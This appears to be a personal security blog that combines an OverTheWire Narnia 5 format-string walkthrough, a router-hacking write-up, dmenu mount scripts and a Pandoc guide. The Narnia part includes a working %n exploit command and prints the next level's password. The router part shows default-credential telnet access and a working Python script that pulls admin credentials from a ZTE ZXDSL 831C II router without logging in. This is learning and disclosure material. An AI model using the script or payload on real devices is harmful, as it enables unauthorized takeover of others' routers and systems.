Narnia 5 - OverTheWire Introduction This level introduces what format string vulnerabilities are. A program is said to have a format string vulnerability if it pass unsensitized user input to one the printf family of functions. These are as follows. c include <stdio.h> int printf(const char format, ...); int fprintf(FILE stream, const char format, ...); int dprintf(int fd, const char format, ...); int sprintf(char str, const char format, ...); int snprintf(char str, sizet size, const char format, ...); include <stdarg.h> int vprintf(const char format, valist ap); int vfprintf(FILE stream, const char format, valist ap); int vdprintf(int fd, const char format, valist ap); int vsprintf(char str, const char format, valist ap); int vsnprintf(char str, sizet size, const char format, valist ap); Or when the user input is directly given to the functions as the format parameter. Here is an example. c include <stdio.h> include <string.h> int main(int argc, char argv) { char input[10]; if (argc != 2) { printf("Usage: %s <input>\n", argv[0]); return -1; } strncpy(input, argv[1], sizeof input); printf(input); return 0; } This code may look secure but it is not. The vulnerability lies in how we call the printf function. Instead of calling it like printf(input) it should have been called like this printf("%s", input). This is because of how the printf function works. The printf family of functions have these placeholders for data types. For example we have used one of these format specifiers, the %s, which tells the printf function to expect a string. There are a bunch of them for all kinds of data types. Here are some examples. %s: To specify strings %d: To specify integers %f: To specify floats %u: To specify unsigned integers %p: To specify pointers %x: To print the hex value How printf works is when it encounters one of these format specifiers it assumes there is a corresponding argument passed to it after the format string. So it takes what ever it gets on the memory and it tries to make sense of it. You can test this with the previous program by giving it a bunch of %x. The program will print a bunch of numbers. This are not random values this are the hex representation of what the program found on the stack. $ ./a.out "%x %x %x" 94a04550 0 25207825 If you take a closer look at the hex 25207825 it kinda seems odd thats because its in the range of ascii characters and if you change it to its string representation you will get % x%, it is reversed because of little endian. This means, in our case, the 3rd format parameter is reading from our input, this can be utilized to read and write to arbitrary memory more on this later. Examining Narnia5 The source code for Narnia5 is as follows c include <stdlib.h> include <string.h> int main(int argc, char argv) { int i = 1; char buffer[64]; snprintf(buffer, sizeof buffer, argv[1]); buffer[sizeof (buffer) - 1] = 0; printf("Change i's value from 1 -> 500. "); if(i == 500) { printf("GOOD\n"); setreuid(geteuid(),geteuid()); system("/bin/sh"); } printf("No way...let me give you a hint!\n"); printf("buffer : [%s] (%d)\n", buffer, strlen(buffer)); printf ("i = %d (%p)\n", i, &i); return 0; This program will give us a shell if it finds the value of i to be 500 but there is no obvious way to set the value of i to 500. If you look closely one of the printf family of functions is being used, the snprintf. The signature for this function is as follows. c int snprintf(char str, sizet size, const char format, ...); Which means the user input, argv[1], is directly given as a format string. We can test this by giving the program a bunch of %x and observe the output. I also have put some AAAA to see which format parameter reads from our input string. $ ./narnia5 "AAAA%x %x %x %x %x" Change i's value from 1 -> 500. No way...let me give you a hint! buffer : [AAAA41414141 31343134 31343134 33313320 33313334] (48) i = 1 (0xffffd6d0) From the output we can see that the 1st format parameter starts reading from our input string, hence the 41s which are hex representations of As. For example if we were to put %s instead of %x the program would crash because %s expects a pointer and when it tries to dereference 41414141 it won't find anything at that address. $ ./narnia5 "AAAA%s" Segmentation fault With format strings we can also give paddings. Lets say we have the number 1234 and we want to print it with 10 padding space i.e. " 1234". The first 4 are taken by the number it's self and the rest 6 are used as a padding which means if the number were to become 12345 the printed value would be " 12345" there would be only 5 spaces. You can achieve this by adding a number between the % sign and the letter that specifies the type of the format parameter, %10x Now where do we go with this. In addition to the previous format parameter discussed there is another one the %n format parameter. While the other format parameters read this one writes. The %n format parameter writes the length of what has already been printed to a variable. Lets see this with an example: c include <stdio.h> int main() { int i = 0; printf("Hello World!!!%n\n", &i); printf("i: %d\n", i); return 0; } The output: $ ./a.out Hello World!!! i: 14 Exploiting Now combining this we can set the value of i to 500 and get a shell. Every time the program is run you can see the address of i being printed we can just leverage that. Oh and don't forget about little endian. In our case the address of i was at 0xffffd6d0 which means in little endian format it would be \xd0\xd6\xff\xff I've added the \x so that python would understand that this is hex value. $ ./narnia5 "$(python -c 'print "AAAA\xd0\xd6\xff\xff%492x%n"')" Change i's value from 1 -> 500. GOOD $ cat /etc/narniapass/narnia6 neezocaeng That's it, thank you for reading.

[Overthewire](https://www.overthewire.org) is a really good resource for someone really new to cybersecurity to learn about cybersecurity. It has a hands on approach of teaching things. It has what I call Seasons. These so called Seasons are not actually numbered but rather named, and each season has an episode. At least that's how I imagine it in my head.  Each season teaches a different cybersecurity concept. For example season 1 (Bandit) teaches about the Linux Operating System. And the way they do it is awesome. You don't even have to install any kind of Linux on your system or use virtual machine. They already have setup a remote server for you, you just have to login using ssh and you're good to go. As my eagerness to learn the hacking was starting to grow I had no idea where to go or where to start. Hacking was, and still is considered a very bad thing in my society so this might also have its own effects. I was always watching this youtube videos and reading on how to hack Facebook or Gmail and these were big deal at that time. But after a while they become redundant. And I had no new knowledge to acquire from them and it started to be boring. After doing these for a while, as I said it was boring, I hear the term script kiddie being used a lot. By further investigating this term I realized I'm a script kiddie So my next journey became to be a real hacker not a script kiddie. I even had Kali linux installed on flash drive as persistence and would flex on some of my friends I also installed Kali linux on my main and only laptop it was not long after that I realized it was a bad idea so I removed kali and installed Ubuntu and Distro hopped a lot, that's a story for another time. After I Googled around How not to be script kiddie every blogpost I read was telling me to learn a programming language and every one was recommending python, so I started to learn python. The main resource I used at that time were the website [codecademy.com](https://www.codecademy.com), and "Learn python the hard way by Zed A. Shaw" I didn't stop there it was around this time that I had to go to collage. I decided I was going to learn Software Engineering because I loved computers duh. In my first and second year of collage I had acquired knowledge in many languages like php, javascirpt, java, C, C++ and so on. But I was no where near becoming a hacker, spoiler alert I'm still no where near became one. While all this was happening I had a book I set aside and procrastinated a lot to read. One day I was sitting in my dorm and I was really bored and looking around my filesystem, and I stumbled upon this book I was setting aside for long time. The book goes by the title "Hacking: The Art of Exploitation, 2nd Edition, by Jon Erickson". I can not tell you how much I loved it. This book opened a whole new world of hacking to me I was fascinated. By reading this book and seeking more knowledge about the terms and techniques and wanting to know more I had to dig up on the Internet for more knowledge and oh boy oh boy I was bookmarking a site after site a book after book. That how I stumbled upon overthewire too. I think this post is being too long so I will stop here and share with you all the resources like youtube channels, websites and Blogs that you can go to learn hacking. This list will grow as I obtain more resources. Books: Serious Cryptography, A practical Introduction to Modren Encryption by Jean Philippe Aumasson The art of software security assessment Practical malware analysis Links: [pwnable.kr](https://www.pwnable.kr) [pwnable.tw](https://www.pwnable.tw) [crptopals.com](https://www.crptopals.com) [w3challs.com](https://www.w3challs.com) [vk.com](https://www.vk.com) [root.me](https://www.root.me) blind rop x64

Mounting and unmounting with dmenu Mounting devices with the mount command is a hassle, at least for me. To mount devices with the mount command you need to be root but if you use any kind of file manager to mount devices you don't need to be root. Have you ever wonder why is that. Well it's simple they use a different kind of command it's called udiskctl here the help. Commands used udiskctl  udiskctl has a lot commands. We will be using the mount and unmount commands. Here is the help.  lsblk What the lsblk command does is very simple, it lists block devices, and information related to those devices, some of the information it displays are the mountpoint, label, name, type, and so on. Here is an example  awk Awk is a programming language, and whole new world of knowledge. I really recommend you take your time and learn it, that dosen't mean by far I'm anywhere near of being perfect in awk, but I think I have some basic knowledge. We will use awk to filter the output of commands and select certain columns of the output. cut cut can be used to select and or remove some section in a line. Will be used here to parse the output of awk, why ? you might ask, why don't I just use awk to do that too and the answer as always is because I'm an idiot, and couldn't find any better way. dmenu Dmenu is not a command it's sort of an app. What it dose is basally simple you give or rather pipe a bunch of data separated by newline to it, and it prompts you to chose from them once you select one of them it prints it, the option you chose, to standard output. For example bash echo -e "choice 1\nchoice 2 \n choice 3" | dmenu  Mounting Let's put these commands together to build a mounting script. First I'm gonna put the script here and explain it after wards. bash ! /bin/sh mount=$(lsblk -l -o NAME,LABEL,TYPE,MOUNTPOINT | awk '/[part|disk] $/ {print $1 ": " $2}' | dmenu -i -p "mount: " | cut -d':' -f 1) [ ! -z $mount ] && notify-send "$(udisksctl mount -b "/dev/$mount")" The First line tells who ever is going to run this script to use /bin/sh to run it. The mount= part is simply assigning a variable. The $() means to replace what every is returned or printed by what is inside the braces the alternative way is using . The lsblk command, with it's options, print the name, label, type, mountpoint. We will use the name to differentiate the partitions. The label to get their name, and mountpoint to know weather they need to mounted or not.  The awk '/[part|disk] $/ {print $1 ": " print $2}' takes the output of lsblk and filters the partitions which are not mounted and "prints" them with their "label".  Now pipe this to dmenu and you get your list of unmounted drives.  The last part i.e. cut -f ':' -d 1 gets ride of the label and preserves the name of drive. On The next line we check if the user chose anything, if so we mount and notify that it has been mounted. Unmounting The unmount script dose the same thing, but in reverse i.e. do use the unmount command with udisksctl bash !/bin/sh unmount=$(lsblk -l -o NAME,LABEL,TYPE,MOUNTPOINT | awk '/[part|disk] \/.$/&&!/nvme/ {print $1 ": " $2}' | dmenu -i -p "unmount: " | cut -d ':' -f 1) [ ! -z $unmount ] && notify-send "$(udisksctl unmount -f --no-user-interaction -b "/dev/$unmount")" Although there is a bit of difference with the awk command. Here I'm using something different to filter the output of lsblk. I'm using '/[part|disk] \/.$/&&!/nvme/'. If you look closely these are two Regexp connected by an and(&&) operand, which means what ever comes through awk must satisfy both of these Regexp. The first part /[part|disk] \/.$/ looks for mounted drives, and the second part !/nvme/ filters out my main internal drive. And that's it folks we have done it.

How I Hacked My First Router I have never found a real vulnerability in the "real world" before. I was just playing CTFs and Wargames. One day I was looking through our old stuff, and I stumbled up on this router the ZTE - ZXDSL 831C II, and had heard before that this router has a vulnerability. So I thought this would be the perfect chance. I set it up and started pwning. Scannig with Nmap Once every hacker is on a network, it's obvious what they do, they always run nmap. Let's run nmap scan on the router and save the result to a file. We will perform a service scan, and also run the default scripts. Will use sudo to make nmap go faster. bash sudo nmap -sC -sV -oA router.txt 192.168.1.1 While we check for the result it's a good idea to run another scan of all ports. bash sudo nmap -sC -sV -p- -oA routerallports.txt 192.168.1.1 Let's inspect the output of the first command. Results The result of the first nmap scan looks like this. {{< figure src="./pic/2021-01-0419-55.png" title="Nmap Scan" >}} Port 80 In the scan we can see that there are some ports open. Let's inspect port 80 first. {{< figure src="./pic/2021-01-0420-03.png" title="Login Page" >}} It appears to be a web interface. The defualt username and password is admin, put that in and you will get this. Now my target shifted to being able to gain the source code of this web application. {{< figure src="./pic/2021-01-0420-05.png" title="Web Interface" >}} We will use the managemnt tab to change the username and password to demonstrate the attack. {{< figure src="./pic/2021-01-0420-06.png" title="" >}} Port 23 If we go back to our nmap scan we see that there is a port 23 open which is telnet, and uses the same username and password as the web application. We can use the following command to login. bash telnet 192.168.1.1 23 {{< figure src="./pic/2021-01-0420-08.png" title="telnet" >}} After logging in you can issue some command to manage the router, and if you type in help you will get a list of commands you can use. I was interested in the sh command which will give you a linux shell. After getting a shell I immediately run the ls command to see what's there. {{< figure src="./pic/2021-01-0420-10.png" title="ls" >}} This is a listing of the root directory. The directory I was particularly interested in was the webs directory. I went into the webs directory and searched for any file which contains the passwd word in it and I found two. {{< figure src="./pic/2021-01-0420-11.png" title="passwd" >}} You can cat the contents of any file in this directory. Finding The Vulnerability I was interested in the contents of the adminpasswd.html. Here is the source code. html <html> <head> <meta HTTP-EQUIV='Pragma' CONTENT='no-cache'> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <link rel="stylesheet" href='stylemain.css' type='text/css'> <link rel="stylesheet" href='colors.css' type='text/css'> <script language="javascript" src="util.js"></script> <script language="javascript" > <!-- hide nameAdmin = '<%ejGet(sysUserName)%>'; pwdAdmin = '<%ejGet(sysPassword)%>'; function frmLoad() { with ( document.forms[0] ) { sysUserName.value = nameAdmin; sysPassword.value = pwdAdmin; cfmPwd.value = pwdAdmin; } } function btnApplyAdmin() { var loc = 'adminpasswd.cgi?action=save&'; with ( document.forms[0] ) { if(sysUserName.value == '<%ejGet(usrUserName)%>') { alert("Don't make such names!Please change it!\n "); return; } if ( isIncludeInvalidChar(sysUserName.value) ) { alert('Invalide characters in user name.'); return; } if ( isIncludeInvalidChar(sysPassword.value) ) { alert('Invalide characters in password.'); return; } if ( sysUserName.value.length == 0 ) { alert('Admin Account and Password can\'t be empty.'); return; } if ( sysUserName.value.indexOf(' ') != -1 ) { alert('Admin Accout can\'t contain a space.'); return; } if ( sysPassword.value.indexOf(' ') != -1 ) { alert('Password can\'t contain a space.'); return; } if ( sysUserName.value.length > 15 ) { alert( 'Admin Account should not be longer the 15 characters!' ); return; } if ( sysPassword.value.length > 32 ) { alert ('Password should not be longer than 32 characters.'); return; } if ( sysPassword.value != cfmPwd.value ) { alert("The passwords do not match."); return; } if ( sysPassword.value.length == 0 ) { alert('Admin Accout and Password cannot be empty.'); return; } loc += 'sysUserName=' + encodeUrl(sysUserName.value) + '&'; loc += 'sysPassword=' + encryptPassword(encodeUrl(sysPassword.value)); //lvwz var code = 'location.assign("' + loc + '")'; eval(code); } } --> </script> </head> <body onLoad='frmLoad()'> <form> <strong>Admin Account</strong> <BR> <BR> <TABLE cellSpacing="0" cellPadding="0" border="0"> <TBODY> <TR> <TD width="590">Admin account has unrestricted access to change and view configuration of your ADSL<br> router. </TD> </TR> </TBODY> </TABLE> <BR> <TABLE cellSpacing="0" cellPadding="0" border="0"> <TBODY> <TR height="30"> <TD width="150">User Name:</TD> <TD><INPUT maxLength="63" size="30" name="sysUserName"></TD> </TR> <TR height="30"> <TD>New Password:</TD> <TD><INPUT type="password" maxLength="32" size="30" name="sysPassword"></TD> </TR> <TR height="30"> <TD>Confirm New Password:</TD> <TD><INPUT type="password" maxLength="32" size="30" name="cfmPwd"></TD> </TR> </TBODY> </TABLE> <BR> <TABLE width="500" border="0"> <TBODY> <TR> <TD align="left" width="494"><INPUT name="button" type="button" onClick="btnApplyAdmin()" value="Apply"> </TD> </TR> </TBODY> </TABLE> </form> </body> </html> This is the page used by the router to change the username and password to access the router. The one I showed you earlier. You might ask "couldn't you just inspect the elements, while you were authenticated, and get the source code ?". That would be a valid question, and my answer would be "because I'm an idot, and I prefer doing stuff the hard way". Anyways if you try to access this site without creds, you would get access denied. Take note here though, On lines 11 , and 12 The page stores two variables called nameAdmin, and pwdAdmin, which are populated by the cgi script by the looks of <%ejGet(sysUserName)%>. On line 26 you would see where this page submits the creds to. It submits them to adminpasswd.cgi. After searching a lot for the source code of this cgi script, I couldn't find it anywhere, and I was avoiding googing for it, because I was afraid of spoilers. Finally I decided to visit the cgi script directly. I was shocked, I thought maybe the cookies from my earlier authentication might have had an effect. So I opened a new browser (qutebrowser), try again, and boom no need to authenticate to access this page. {{< figure src="./pic/2021-01-0520-10.png" title="Accessing the cgi script" >}} We can change the username, and password, and access the page boom hacked, but wait there is more If you're curious enough you wouldn't stop there you would dig for more. So let's dig some more. Obviously any site asks for the old password to check if you are who you say you are. This page does the checking on the client side, in the open. Which means you can just snatch the username and password. {{< figure src="./pic/2021-01-0520-12.png" title="Inspecting the page" >}} I wrote a script to do just that. python !/usr/bin/env python This script extracts the Username and Password of the ZTE - ZXDSL 831C II modem. This script can only be used on a system you have the authority to execute such scripts on. If you did this attack on a system you don't have authority on I'm not held responsible. Do so on your own risk. author: Omer Abdulaziz email: omerabdi@pm.me import requests import sys import re host = "192.168.1.1" try: host = sys.argv[1] except: pass try: print(f"[] Attacking {host} ...") response = requests.get(f"http://{host}/adminpasswd.cgi") except: print("[!] Network error") sys.exit(2) if response.statuscode == 200: userna = re.search("nameAdmin = '.'", response.text).group().split("'")[1] passwd = re.search("pwdAdmin = '.'", response.text).group().split("'")[1] print(f"[=] Username: {userna}") print(f"[=] Password: {passwd}") sys.exit() else: print("[!] It appears the target is not vulnerable") sys.exit(1) Running the script. The script runs on the 192.168.1.1 target by default, but you can change by supplying the target of your choice. bash python exp.py or give it any other target python exp.py 10.0.0.1 {{< figure src="./pic/2021-01-0420-18.png" title="Running the exploit" >}} Inspired by malwaretech's "[How I Found My First Ever ZeroDay (in RDP)](https://www.malwaretech.com/2020/12/how-i-found-my-first-ever-zeroday-in-rdp.html)" post.

Pandoc Have you ever wanted to write a document, but you hate using applications like MicroSoft Office, Libre Office, Google Docs, or anything of the sorts. Do you want to write your documents just like you write codes, with your code editors perk. I for example use vim and I would have loved, if these application supported vim bindings. Well look no further, you can just use pandoc. Pandoc is a command-line app which can be used to convert a document of any type to any other type. Basically use your text editor of choice to write your document in any markup language like markdown, and then use pandoc to convert it to any format you want, be it pdf, or docx. In our case will be using Markdown to write a document. Installing pandoc Pandoc can be installed on Arch based systems like this bash sudo pacman -S pandoc In order to change documents to a pdf format pandoc uses what is called a pdfengine. The available pdfengine are. pdflatex lualatex xelatex tectonic wkhtmltopdf weasyprint prince context pdfroff By default Pandoc uses the pdflatex engine, but you can download and use which ever one you want. To specify your desired engine you can use the --pdf-engine option as we will see in a bit. If you are a beginner I recommend using the wkhtmltopdf engine, which can be installed like so. bash sudo pacman -S wkhtmltopdf Markdown Markdown is a lightweight markup language like HTML, but much simpler. Here is an example. Markdown Section1 This a paragrah. Sub Section This another paragrah. This is a bold text This is italics Bold and italics ~~Strike Thourgh~~ code with no syntax highlight Here is an image  To insert a link all you have to is [DuckDuckGo](https://www.duckduckgo.com) Here is a list List item 1 List item 2 List item 3 Here is a numbered list 1. List item one 2. List item two 3. List item three In markdown the is treated like a heading. Basically if have one , it means it is the first level heading, and if you have two it's the second level heading, you get the idea. I will leave some links down below if you want to know more about Markdown. Converting The Documents To convert what you have written in markdown, save it with a .md extension, for example notes.md, and issue the following command. bash pandoc notes.md -o doc.pdf Or if you want to specify a specific pdf engine. bash pandoc notes.md -o doc.pdf --pdf-engine=wkhtmltopdf Here is a sample pdf file I converted from a note I toke about runit. [runitshortnote.pdf](./runitshortnote.pdf)